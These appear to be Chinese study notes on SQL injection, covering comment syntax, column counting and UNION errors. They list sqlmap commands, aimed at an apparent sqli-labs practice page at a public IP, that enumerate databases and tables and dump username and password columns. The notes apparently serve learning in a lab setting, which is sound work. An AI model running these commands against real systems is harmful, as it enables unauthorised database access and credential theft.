2021-9-15
常用的注释:
-- + 、%20
order by 判断列数
information_schema默认数据库名
为什么会存在sql注入:前端没有对客户输入的数据进行识别,客户输入的数据被后端执行
Union:为什么报错 列数不一致。
-- +的目的:
1、排除别的语句的干扰
2、使字符字符闭合
sleep将函数暂停几秒
常见sqlmap命令:(-后面加缩写;--单词)
一、 先去判断当前网站是否存在注入
-u
Sqlmap.py -u "http://106.52.39.144/Less-1/?id=1"
二、查看当前库库名 --current-db
Sqlmap.py -u "http://106.52.39.144/Less-1/?id=1" --current-db
查看当前数据库下所有数据库名 --dbs
Sqlmap.py -u "http://106.52.39.144/Less-1/?id=1" --dbs
三、指定数据库库名 查询所有表名
-D 指定数据库名
--tables 爆当前数据库下所有表
Sqlmap.py -u "http://106.52.39.144/Less-1/?id=1" -D security --tables
四、指定表 报表里面的所有列
-T 指定表名
--columns 爆所有列名
sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security -T users --columns
五、指定列名 爆里面的字段
-C 指定列名
--dump (下载)
Sqlmap.py -u "http://106.52.39.144/Less-1/?id=1" -D security -T users -C id,password,username --dump